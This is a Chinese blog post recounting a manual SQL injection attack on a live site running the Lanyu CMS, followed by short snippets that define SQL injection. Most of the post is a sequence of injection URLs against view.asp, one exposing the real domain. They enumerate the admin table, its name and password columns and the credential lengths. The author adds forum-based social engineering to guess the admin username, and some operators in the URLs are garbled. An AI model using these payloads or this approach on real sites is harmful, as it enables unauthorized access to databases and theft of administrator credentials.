最近無聊,在網上走來走去看看。發現現在的整站系統可是越來越多了,修改版本等等的n多阿!而藍雨設計整站的使用者也越來越多了,藍雨整站系統是從nowa 0.94修改而來的!基於nowa的系統不單指藍雨乙個還有很多的!我在此就不一一枚舉了,核心都是一樣,只是程式的附加功能就各自不同!安全方面因為基於nowa的系統所以到目前知道的漏洞就只有上傳而已。以下文章中就會出現nowa修改系統漏洞當中從未有的sql注入漏洞!只怪藍雨修改程式的時候沒有做好注入問題了!這個可不能怪我!誰叫人家程式設計員不會注意安全死角阿?
二,猜解資料庫表
因為本人懶惰所以只好借用nbsi進行sql注入的工作了,怎麼知道是不是因為的nbsi實在太厲害了,不能夠殺雞用牛刀。竟然它全部檢測不出我所找到的sql注入點存在著sql注入!實在太令人感到吃驚(hak_ban:難道真的....真的要我手動注入t_t)nbsi太給面子了!所以我只好硬著頭皮去進行手動注入了。首先猜解資料庫的表是否存在admin表。構造語句提交
http://***.net/view.asp?action=art&art_id=70%20and%200????(select%20count(*)%20from%20admin) 現在的程式當中的資料庫管理員表,不就是admin,adminuser user之類的名稱,所以我們只要抓住程式作者的心理就可以知道了,提交語句之後頁面返回正常,我們就可以確定資料庫當中是存在admin這個表的。我們只是需要admin的密碼以及賬號,所以資料庫當中其他的表可以忽略。
三,猜解資料庫字段
在猜解之前為了減少更多的麻煩和無謂的猜解,應該要對於所入侵的**進行一些資料的蒐集,例如管理員的qq以及管理員所使用的網名都是要知道的,因為我們通常都會使用容易記憶的密碼以及賬號,從而使自己可以不會忘記。找了文章頁面等等的功能頁面都找不到文章編輯以及管理員的qq號碼。只好在bbs當中尋找了,很幸運的是我們在bbs當中找到了「藍雨」這個使用者名稱,這樣子等待會猜解admin賬號的時候我們可以試試中文的名字或者是拼音字母。(hak_ban:我可是曾經在msn以乙個名字看穿plmm性格以及生日的哦,大家要注意社會工程學的重要性阿)
廢話少說,我們看看這個程式的管理員欄位是什麼!?首先猜解是name的提交語句如下http://***.net/view.asp?action=art&art_id=70%20and%201=(select%20count(*)%20from%20admin%20where%20len(name)??0) (hak_ban:*_*不是阿!不是name欄位阿)提交語句後資訊返回頁面顯示不正常就證實admin表中沒有name這個欄位名。看來又要想想如何去進行猜解了,既然name欄位不行就試試admin_name欄位行不行!再次構造猜解字段語句:http://***.net/view.asp?action=art&art_id=70%20and%201=(select%20count(*)%20from%20admin%20where%20len(admin_name)??0) (hak_ban:這下子總可以了吧?我又邁進一步了!)提交語句之後頁面返回正常了,這下子終於可以了。
然後,我們就開始猜解password的字段了,其實一看上面的回顯我們就可以非常肯定的說password欄位就是admin_password,所以提交的語句就是http://***.net/view.asp?action=art&art_id=70%20and%201=(select%20count(*)%20from%20admin%20where%20len(admin_password)??0) 資訊回顯正常對吧!?哈哈哈
說到這裡整個猜解就差不多完場了!(菜鳥:什麼什麼阿?還有賬號和密碼了?你丫的是不是傻了?)猜解密碼和賬號就更加是乙個麻煩和浪費時間的活來的!好好,我們去看看賬號和密碼的猜解如何?首先我們猜解賬號的長短阿!假設,我們之前就已經拿到了管理員常用的賬號名稱「藍雨」是管理員賬號。我們就有兩種可能性,一是藍雨的拼音「lanyu」,二是藍雨的中文轉為ascii碼進行猜解。我們首先試試拼音這個的可能性,如果是這樣子的話我們就要構造admin_name的長度為5,所以提交語句為http://***.net/view.asp?action=art&art_id=70%20and%201=(select%20count(*)%20from%20admin%20where%20len(admin_name)??5) 頁面資訊返回無法正常顯示。然後再提交http://fj126.net/view.asp?action=art&art_id=70%20and%201=(select%20count(*)%20from%20admin%20where%20len(admin_name)??4)這下子頁面可算是正常了!然後再次提交語句為http://***.net/view.asp?action=art&art_id=70%20and%201=(select%20count(*)%20from%20admin%20where%20len(admin_name)=5)我們就可以確定admin_name的長度為5了。賬號長度出來了,而password的長度我們還不知道,根據資訊收集得知密碼是利用md5 16位加密的,所以我們可以猜解為密碼長度是16位喔!提交語句http://***.net/view.asp?action=art&art_id=70%20and%201=(select%20count(*)%20from%20admin%20where%20len(admin_password)=16)這裡就不截圖了!我們可以基本上就知道了!賬號長度為5位,密碼長度為16位。(hak_ban:說真的我很久沒有手動了,都差不多腰痠背痛了!)至於賬號是多少密碼是多少我就不再列舉了!經過測試剛剛的社會工程學得到的管理員賬號為:lanyu是正確的!而密碼的確是md516位加密。整個過程可以利用臭要飯的csc進行注入測試!
四,總結
整個程式的sql注入頁面有幾個,都是基於藍雨整站自身新增的功能頁面沒有做好相關的sql注入導致的,如果大家有在使用這個程式的話,可以使用通用防止注入的指令碼進行防止,雖然說md5需要暴力破解,但是如果你真的得罪人的話,不要說破解了。可能你的**都會被別人幹的一乾二淨,網路安全是很重要的一部分,希望大家不要輕視安全這個環節!以上文章如有錯誤請大家指出,有什麼問題可以到非安全的論壇或者bct小組找我!
SQL注入漏洞
sql注入漏洞曾經是web應用程式的噩夢,cms bbs blog無一不曾受其害。sql注入的原理 以往在web應用程式訪問資料庫時一般是採取拼接字串的形式,比如登入的時候就是根據使用者名稱和密碼去查詢 string sql select top 1 from user where username...
SQL注入漏洞
sql注入,就是通過把sql命令插入到web表單遞交或輸入網域名稱或頁面請求的查詢字串,最終達到欺騙伺服器執行惡意的sql命令,比如先前的很多影視 洩露vip會員密碼大多就是通過web表單遞交查詢字元暴出的,這類表單特別容易受到sql注入式攻擊 sql注入的發生 當應用程式使用輸入內容來構造動態sq...
sql注入漏洞
什麼是sql注入 通過把sql命令插入到web表單提交或輸入網域名稱或頁面請求的查詢字串,最終達到欺騙伺服器執行惡意的sql命令。通俗地講,它是利用現有應用程式,將 惡意 的sql命令注入到後台資料庫引擎執行的能力,它可以通過在web表單中輸入 惡意 sql語句得到乙個存在安全漏洞的 上的資料庫,而...